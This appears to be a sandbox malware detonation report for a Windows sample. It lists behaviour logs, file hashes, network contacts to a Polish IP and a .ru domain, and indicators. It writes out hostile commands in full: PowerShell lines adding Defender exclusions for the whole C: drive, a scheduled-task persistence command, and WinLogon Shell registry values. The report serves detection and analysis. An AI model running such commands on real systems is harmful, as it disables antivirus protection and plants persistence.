C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Windows\Resources\Themes\aero\Shell\NormalColor\explorer.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\sbaEnqO3wz.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\comServerRefcrtNet\powershell.exe

"C:\comServerRefcrtNet\powershell.exe"

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comServerRefcrtNet/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\comServerRefcrtNet\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

Network

Country Destination Domain Proto
PL 77.73.129.75:1912 tcp
US 8.8.8.8:53 cx38856.tw1.ru udp
PL 77.73.129.75:1912 tcp
US 8.8.8.8:53 cx38856.tw1.ru udp
PL 77.73.129.75:1912 tcp

Files

C:\Users\Admin\AppData\Local\Temp\hwid.exe

MD5 816e9b3d8faf4363950a3d9129827a11
SHA1 7da1893debf23ed95d8e7ca8c1c50cd7fdba7c4e
SHA256 21859a1ca0ee915f6da48d6377c75854abe0aec5710621db0179390795f478e0
SHA512 dbe55c87fb5a78b1a0af228d9c32e7b81349c058fbe8bef07b4a9efdeee6d1fbf3c713809996398cb51a48ea9811dc4ad326c9da0dfcd93f7cb084346ec95f3b

C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe

MD5 b045a059a8ea1e07b8683c4dcad8bf33
SHA1 2e0c49010ae8b71c4a89667ef4acc7ecb92f8d13
SHA256 7e9ac472cbfb7e7955ea76ceb80d1a350158a83f043796e31b2050307cbba7d2
SHA512 b4716cb4bac88720f1ead0ccfe91e5f6aee481d2bc19335750a34689cda3c57c805bf4eaadb6c739e5faceee9e3f57e93f081c46993782580688b6b9ccc6ba1f

memory/512-17-0x0000000000400000-0x0000000001400000-memory.dmp

memory/1988-27-0x00000000008E0000-0x0000000000A76000-memory.dmp

C:\comServerRefcrtNet\mqTOHq8aHZClYn48E.vbe

MD5 e9b30ad4a605da5d269fcf68e8460dee
SHA1 379b8c9c8e09497a763d346e0c9962e7d12f1b24
SHA256 aad887b3e8d352a4157320bab3a082e25bbd651443cb85c43fd5a368246e5c41
SHA512 6f0e22fc3146b0a2c306a2e67d5984c396cd30c845ecd86db52a2705f68545cfc57f0ad6735b0280487239251c7eeccda2ceec24bd88815746fe74b17ad8773e

C:\Users\Admin\AppData\Roaming\d3d9.dll

MD5 73bd889f94de4bfc1d8262c57aa53c8f
SHA1 ead79448f3a883c587ae1f2e26d2f71b18a38b50
SHA256 dc9c1747e3f6bcc2eaccdca84ab8f76881dfc04cf0c06fc00f1c02ec2c1f0609
SHA512 05dab2f0b978aa34d3fa59bf89c0061622a0fc99c4f00570cbc42dbe371edbd3444cda7cde4ccff521b36a4dea74464759571ea35e21312da538ae19564f11d5

memory/4736-35-0x0000000000400000-0x0000000000452000-memory.dmp

memory/4736-37-0x0000000005860000-0x0000000005E04000-memory.dmp

memory/4736-38-0x00000000051D0000-0x0000000005262000-memory.dmp

memory/4736-39-0x0000000005280000-0x000000000528A000-memory.dmp

memory/4736-40-0x0000000006430000-0x0000000006A48000-memory.dmp

memory/4736-41-0x00000000055C0000-0x00000000056CA000-memory.dmp

memory/4736-42-0x0000000005450000-0x0000000005462000-memory.dmp

memory/4736-43-0x00000000054F0000-0x000000000552C000-memory.dmp

memory/4736-44-0x0000000005530000-0x000000000557C000-memory.dmp

C:\comServerRefcrtNet\lnxvZRavX52Sj8TeqZsoOZAX1b085ZLmiJmz2YXZ5HGWoFSPgyZVlmrEm.bat

MD5 3fae6518481781ecb7456ab4febba3bf
SHA1 28aefef1012344b0226e2a3f21f9bf1bd89c3acf
SHA256 db0ac9dd933a8546f18f86d8985ac579b6f50ac5242b7980b99512a7429375ff
SHA512 781678b5c9bdeaf273cb4ca7343b5e0725cea5020ce2cf8e4eb85da18e0e87ebb6a96a7d059a320731f06265cad8485ccc372820d8474706ed532f794a053e24

C:\comServerRefcrtNet\ComsurrogateHost.exe

MD5 0f955b3f70b28d7303d8ac1327639d24
SHA1 98005ccb926070a45d58dc905cf73d8de6943953
SHA256 3dad4c00a25d6d16be232f43deb4ba480731fac732db4443932545894911a1a8
SHA512 a5f9567f911c3b76f15a9e400cdb73caca6f2fb819039480bb0af2ec9a1b6861a44d935fa08fa76da9cab0810bdb96a1a4b345f87d72b96a2840d44d4aba9706

memory/4016-49-0x00000000000F0000-0x00000000002AE000-memory.dmp

memory/4016-51-0x0000000002310000-0x000000000231E000-memory.dmp

memory/4016-53-0x0000000002340000-0x000000000235C000-memory.dmp

memory/4016-54-0x00000000023F0000-0x0000000002440000-memory.dmp

memory/4016-56-0x0000000002370000-0x0000000002388000-memory.dmp

memory/4016-58-0x0000000002320000-0x000000000232E000-memory.dmp

memory/4016-60-0x0000000002330000-0x000000000233C000-memory.dmp

memory/4016-62-0x00000000023E0000-0x00000000023F0000-memory.dmp

memory/4016-64-0x000000001AEC0000-0x000000001AF1A000-memory.dmp

memory/4016-66-0x0000000002440000-0x000000000244E000-memory.dmp

memory/4016-68-0x000000001AE60000-0x000000001AE78000-memory.dmp

memory/4016-70-0x0000000002450000-0x000000000245C000-memory.dmp

memory/4016-72-0x000000001B070000-0x000000001B0BE000-memory.dmp

memory/2336-88-0x0000021B6CEA0000-0x0000021B6CEC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kjgf2uu4.pra.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

\??\c:\Users\Admin\AppData\Local\Temp\nr14kmka\nr14kmka.cmdline

MD5 b1f02cbb5cefa2e608d46b1597bfde7c
SHA1 a38881618ee652cd10025217b010b102cceaf827
SHA256 28265a6d8f790617e201fb7d2afb39cfee69dc44945d1f30dbe066d86385a281
SHA512 b5f9df4a514f367c2371342df475181a0411e03d68cc57f61bbfcac967a5884119cbde5458854a5d5345f1bf5bc4129ce0d9490edabcb5a91e1befed504554dd

\??\c:\Users\Admin\AppData\Local\Temp\nr14kmka\nr14kmka.0.cs

MD5 779da4be05329609871d6ad0edf7a1e5
SHA1 7593d6753fbfe272af4d63a05a02be0340c92ed5
SHA256 accf0bb23319a6c296f608bc716f648675d258b3e7fb4031e94c85bdf0501498
SHA512 336336ead8d2dfcd01c1944fe5c2ff8c2f42cc00ed94f62cb3932271f455d11b9091e4d3c2dd07638c64c3526e6ed2e2f098c3fc7ce7cb56d89e6b018d7a1a7f

\??\c:\Windows\System32\CSC284368D78044F41BA30132654ADC74A.TMP

MD5 76193a570fc043b07f2da69ddc0d2266
SHA1 ff4eaaa5d3abed0831c72bbff23adae30f02e4ff
SHA256 a47b908b5cadfac55e3a1702f4e1bb4cfd9b5d7b27e1f6bfb395bc2b29cd3cc8
SHA512 4588c0ddfd356f096aed916e2aecfec09612595fa3864f1896d642a6d0c9294dd21287dadd6e2ccdfde0b6199de6985eba7b25d71364ef9dc17f2f49b6ac7473

C:\Users\Admin\AppData\Local\Temp\RES9470.tmp

MD5 efd3c28b67b39db672c1ba2f9948a916
SHA1 2e1b859d147f0dbac9cee962d4b2c8dcb90cf7a4
SHA256 0030fa6dfaa08e0879541049857d3b7f1052727a25d4c6877ad180a82ebb8514
SHA512 0cf50396999552baf97934206dfad163f396f2e0bfb90f594355d9fdb3c88cb8b117924eb46fa3b490ca3a77671df67f2dada9a2195686974b9a5e659c2f6ea6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/2336-215-0x0000021B6D070000-0x0000021B6D28C000-memory.dmp

memory/4816-218-0x000001E243A00000-0x000001E243C1C000-memory.dmp

memory/1976-220-0x000001DF70320000-0x000001DF7053C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e907f77659a6601fcc408274894da2e
SHA1 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

memory/540-232-0x000002AEEF760000-0x000002AEEF97C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bd5940f08d0be56e65e5f2aaf47c538e
SHA1 d7e31b87866e5e383ab5499da64aba50f03e8443
SHA256 2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512 c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

C:\Users\Admin\AppData\Local\Temp\yRstqPcxW7.bat

MD5 c1be8d3f2ad3aab8070e1faf5835401a
SHA1 102a38c99a37078df15c838e09f58d2602be7604
SHA256 b985ab0a527efeaff6d8cd7f1028b6d5e86c7191e64b71ff433d9b4e62478b1e
SHA512 451242f57aeb1a7b67c88d54beb5f1089d4d3a8616aca8804a229a792e76c35d16739023febef16074bbdbede968f98e82ab3ab0f8d0cec4c8e84c6d624d0f56

memory/3860-245-0x000001E969F80000-0x000001E96A19C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

memory/3608-241-0x0000021D249A0000-0x0000021D24BBC000-memory.dmp

memory/4348-240-0x0000027C273A0000-0x0000027C275BC000-memory.dmp

memory/3696-231-0x00000164EE220000-0x00000164EE43C000-memory.dmp

memory/4252-226-0x00000193B2F30000-0x00000193B314C000-memory.dmp

memory/2800-225-0x000001E57CF90000-0x000001E57D1AC000-memory.dmp

memory/3412-219-0x00000277B0910000-0x00000277B0B2C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/4552-246-0x000002582B590000-0x000002582B7AC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2ea91e7d1b473f8290ae52d13e105194
SHA1 5e565d99a7733250427e70f5f6e1951a081deed6
SHA256 712db2b991a3c11ccd71b36cfe99fad0b5b1eb1026b12d28c35a43334128671a
SHA512 0d6e2f0f8963986cb27a5cb853c5a87af5d2b65142ff082b4a12681b467d4a72efbcaea71307513523915aa4f27e7b238c67f4ab563f69525938f38253599424

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a4c5ca893b8b3ef8599cfed355385fd5
SHA1 deb71c93b20727734302d47aed85ab998ade27a0
SHA256 4e1d8e194558eca5db27b086e9c8b48685a41bd21ec9c686b943eaded3a2ad33
SHA512 36950dd1ad8b39f6e2c0768789fbed6d417f1f406af16c866ace049555fab06cc0b670b933512a956444e8d1eda3c3b01613cd2c7041dd5eafc5d04e5df9be41

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 815f9e54d2e55a6cd87a044f75fdba0c
SHA1 9e2c91b5d015a2f96539227ed0a5d83cf26f6c08
SHA256 ec7d07723ca9c032e3662c0a316318065854ed4dc54106a5214278cbd148e75f
SHA512 9198d94b9d3ef35693881e3dc3e1c7f4b42d98f23a27f58cec67309628504de6940f0ac58bff1de2923b9d1b2dd11be82ea98bad9419d2e22f610df01c7401a3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8846686b7f2d146c0baa27459eedbd8d
SHA1 c953a3d1c7870a9d7ded709301f3ae7f1ea94e61
SHA256 33e3dc5ccf5c09b1c26c524b284335712ef653a2b2169732d8d890f615026c65
SHA512 3e72136bff1772ae7934c67ead939b4783ffb9a3657a366881504c7a11e76abe6469b6a4701b031fd564e6d257f7c62f52fb69f93a67459fadf909fefbbe6154

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4f473e15a0686d0c819ad40b5f232368
SHA1 a769892ae2e8203e7d4a992a317189b56723da33
SHA256 53d6c0d9a801d45fefdcec9b3ecf217fef683efc4e40ba9c72f0116ee4d20237
SHA512 d9b43132432078d5496688717253e58e7caab0dcbd20fc41fa8a718d11d699e93ee198f18be4243ed34bcf8912e1377888fe72ae5b26d920e765ab523f0bdf55

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c65338524586fc00cf00e679a7d4a1f4
SHA1 62abf26bfb979dcbf7c7649cf8a681c2a8c7c9ae
SHA256 faa246e6b356f55ad8b18cea908dbf9035f67feaa06f8259d934306e13e88bf6
SHA512 c6721362afa4998c60ff60225a7b7571aaf1dbc8cb624ad7557b365a37df26e629763fa052dc31904b3175587e940d7e0630362620870c2c7351960a14c29310

memory/2140-393-0x000000001B780000-0x000000001B788000-memory.dmp

memory/2140-399-0x000000001B780000-0x000000001B788000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8JExSyzmRo.bat

MD5 5bbb2ba5759ff4f141a806be05974274
SHA1 4f60b200a12285536f09e1d751c66ad9c6d04605
SHA256 8117b9ccb1cb021f5c789278fd4cdaca04721651e505f77a7b066ffb8bc0d0d1
SHA512 875bee938c0dcedf2ea0f6a548f4cb4dc3068da49eafb3020f59a311d40233f3425e4ae931f2e8c89cf644a0d27bf5bc2b2eb73e92483a36a5e4c46694ccd79c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

MD5 7800fca2323a4130444c572374a030f4
SHA1 40c9b8e0e5e7d72a5293f4010f2ccf21e637b4aa
SHA256 29f5645ac14353ac460858f52c856548f3aeb144b09eef672a6b4849bafe742e
SHA512 c8a7ad930b8c07007c7a67d8c32a2a4a401dcc34ab966e0e80901655fcbe1f5c95b72a195e6381b1de56c2c987eeab093d8e89891bec9e9684785c5d824b3554

\??\c:\Users\Admin\AppData\Local\Temp\siuck4sj\siuck4sj.0.cs

MD5 89b1526851ceb7cd847d4b812125c204
SHA1 f23327b91a0fb8a3e25a71736177ccadc91b0c51
SHA256 2ca72821e0aa6718db4ecf749601b199fbd777bdca848b4ab5eb2f40e0d0d48a
SHA512 05ae1b407bac075396d20347f93d66c7d4449c93fd5c54d75ea4bb94b9f2f99eb9732812b4463932bfc70595cd1953e84f2d7a812e577fef8822d9de539ad9b5

\??\c:\Users\Admin\AppData\Local\Temp\siuck4sj\siuck4sj.cmdline

MD5 2af4e3a4ce3ce147cb2a82b4c0ea1497
SHA1 1583b6c9c660933ef796ed24d0c5c7517a99e5a5
SHA256 c23f324fe927dfab71be97374395165a57765b72da2684a56a3769c9510cf340
SHA512 3a794587c268b3beec79eaf4f8b4aa9954d8c01554aef279b87544ac8872abf2613597bf1b4af05b298f30b4dc064c349877b793604d93ac47f754174591a144

\??\c:\Recovery\WindowsRE\CSCA07083C9CF314723A6CD4948A81461.TMP

MD5 7d2e8e4e860af3f38678138d581169b7
SHA1 a19c108c0d67162d2cb5db8fbb4509bb964fc540
SHA256 dffe1888b89a6b0daf60389e236c2aaf6fc479101f832859e09156846c16b2dc
SHA512 d2b8b3285a967a0be399fbfffd19a99df980f27e0e27827625b688b4cd63c13115902770fdbae43da19c8209412bab8277eb94e5959fe893ee40cd2b620efd63

C:\Users\Admin\AppData\Local\Temp\RESE05.tmp

MD5 e51ed8be5499c5e68ca2567542fd1046
SHA1 3fdc77dad1f90773909580e935214343e4c737b7
SHA256 a1442f39be780010ae860388f70b01e504e1fea120bd6d7c8f450205ddef64bf
SHA512 419bd42cffd5663b4f7a845deb96a3b1cd6b0187895961d953849bd3be85496a9de5f8e698490095d0ddfd440073ca802efae11d1d4ff01d0841b7835104dfaa

\??\c:\Users\Admin\AppData\Local\Temp\xfvq1vqc\xfvq1vqc.0.cs

MD5 7a4df95e124d1aa1e8230a590ef597c8
SHA1 8da03d9b151ca2ef4d5ca2415410c99f74c22be3
SHA256 adaa2c00d92f5bd214ba5bb64985c12a42f441020da2cb09e7ff8e44f8dc9be0
SHA512 c1cd36b220ce6b52e21b65015c42ae282da10d034c008588782a06e96e48f2b28c61b358d8c5e549126ac6626c5e26b9780c5dbec386ba067a5ae6ce3e2ba23c

\??\c:\Users\Admin\AppData\Local\Temp\xfvq1vqc\xfvq1vqc.cmdline

MD5 fa0e0971aebde52256d36f745fe76e91
SHA1 8579e7e24e893c9700a29075311d0eafa08509e3
SHA256 f16e897535442e6ebd7baa0dd0ac4bc5945a11a4d035261f6529f4e5e447a55f
SHA512 7b868ba64fe3e05519f7db3568d49140da83ecea025f964645fe025ccab784bba8526ff17b941b5a025a51bb20fc924dbd71bf38a8947ffc1428f717cedda8bf

\??\c:\Recovery\WindowsRE\CSC671A800D3B124051996CE8178E9AE197.TMP

MD5 987ffb806ae972d4d819462882de79b5
SHA1 f83a142a5257aeaf4e4b1a6890a4a3dc5bc742af
SHA256 ccbc1d568bc16cfcacaf127122b7ffeacb1cf5c1237e0c5f3bc6921d9ab82496
SHA512 69c6c8bd9b3ddc4196d1d92e7e224d51d814aeed0c674790480ab321e5564b398c8fae97154e2ae508928e51066bef58a6cdcbd2528de71953facaa360f10937

C:\Users\Admin\AppData\Local\Temp\RESFBA.tmp

MD5 f32f7bd9b836f08c2ab9be3141074d0f
SHA1 9d5bbad61d8f0a176889ae9b7876d6788999da4b
SHA256 6526894232ccceefba49913cc9a587362b08a8f238ce704f29e2ee210fe3dc67
SHA512 002319f1b24619b519dc746f9036876023df81fc4a830d571f90cca253876d245205bd178a735c16248d27ba04b98f08f91bdb7020471e6eb255b17918545b4a

C:\Users\Admin\AppData\Local\Temp\RES11AE.tmp

MD5 b77511989053b30313dc0854682ab1cb
SHA1 9d404ff5a5b823064c50cf33833dacea6a2e890b
SHA256 9226fc1e00393abcd355bcafe926caa90c61d0fe01f209480dc6ecea034a9968
SHA512 8903ebc8ef5815929666922b685d7234eba64b6d4f6d08797db2d1cbdb0ac4c59fe1147627b8fa7b5bc971609481b22b5cd7a5a2eb08a93d33e4b563e13cc98b

\??\c:\comServerRefcrtNet\CSC40A8B3E794A14CB6B81AC9695A086B0.TMP

MD5 2b854aa4ad703ddd796b59a5b6213e83
SHA1 2dfa8f55c5c1a24e75aaff8362211c32ce5e37bb
SHA256 e3606666627a83b92b4ecc9c1df7c3f6a627ef8e49f477c249535ed4077f841e
SHA512 1d8748f0121b947c425514babbd9c87e7070caec1adcc1be598b513707376f22dddb9dbe31c71baf70ad30b46638b15caa89f5cf84b9b31065f8cc47ec386e64

\??\c:\Users\Admin\AppData\Local\Temp\u1elvbdo\u1elvbdo.0.cs

MD5 f6f74a7caf7a3bbc02d71d9ce8567cdf
SHA1 6a2218c8402d2e5de831771b9e9aaa1ad29fea6e
SHA256 b86f1c2388c9ba33ac6f83cdf74da3bdc9218dd1f275aaeec51c1b1105feecac
SHA512 1bc7d0b5018c289399ce0ed6f4299c04119a2ce30dad39d102c00e1c2f515127ac5d2e61a5146b724eb29e21b679bf818451f81c5d348acaa0661770b92cd9fb

\??\c:\Users\Admin\AppData\Local\Temp\u1elvbdo\u1elvbdo.cmdline

MD5 96c2314ffc31a7114569ffc2689722a6
SHA1 5f674025107850068b4263962ae74f2ba5b2473f
SHA256 cf36775c5a9aa3dcce34bcc066b27b070c93c73f7079c48e052ca67c56628918
SHA512 b6e4d3def3bda9f910cfa84d1f89ff7227c46cd442ab84ae49613be16363514fd0134884dfac4f226b42b3b8327bfd99fb2001a9270bdc01f12e28a2814446f3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9006afb2f47b3bb7d3669c647651e29c
SHA1 cdc0d7654be8e516df2c36accd9b52eac1f00ffd
SHA256 a025443b35555d64473b1ef01194239e808c49b47c924b99b942514036901302
SHA512 f2e72bbecfa823415bd0be7a091b1272e10e11059a71baf115780aa7ce3e694d114f6642de161ccba24e2182765b8188cc6dbb804fd07e318af9e1917549841c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 199108c775dd969e87b271021f7e932b
SHA1 42d36922a7ddde1022853ccd9f6a003a67609da9
SHA256 05e5c29da3162d644ee8449387379a211dc40a806b80a761b3b11afb266ba1cb
SHA512 0b3c97369cd70a837a2376150ec8487550390927ef39c478abbf0af080140ddbcaf09610e9e648f5b3b88323a417a6bb262383a8fe2153116a79d37c310ba723

\??\c:\Users\Admin\AppData\Local\Temp\ywdpcwvf\ywdpcwvf.cmdline

MD5 ebf73a3f91a80381598da351e244c992
SHA1 73e7756de15755a4187fe2c10bb59faaf581cbe4
SHA256 c97a000697f901efc0c8c3de16f05efd93ebe44a0e38dd05ddf538d28e62647c
SHA512 0e232f8dee066f4d401a2ccef50ab5c59293006ea0b94e58177a6b22c981f075f2fdb3c2b7051fa84aa0983f83174d996f467bd282c9440fabf60d75fb74eaf4

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-06 17:11

Reported

2024-07-06 17:15

Platform

win7-20240705-en

Max time kernel

39s

Max time network

81s

Command Line

"C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\winlogon.exe\", \"C:\\Program Files (x86)\\Google\\Temp\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\winlogon.exe\", \"C:\\Program Files (x86)\\Google\\Temp\\powershell.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\powershell.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\winlogon.exe\", \"C:\\Program Files (x86)\\Google\\Temp\\powershell.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\powershell.exe\", \"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\conhost.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\wininit.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\b2a802a2-3b12-11ef-8991-d2f1755c8afd\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\winlogon.exe\"" C:\comServerRefcrtNet\ComsurrogateHost.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
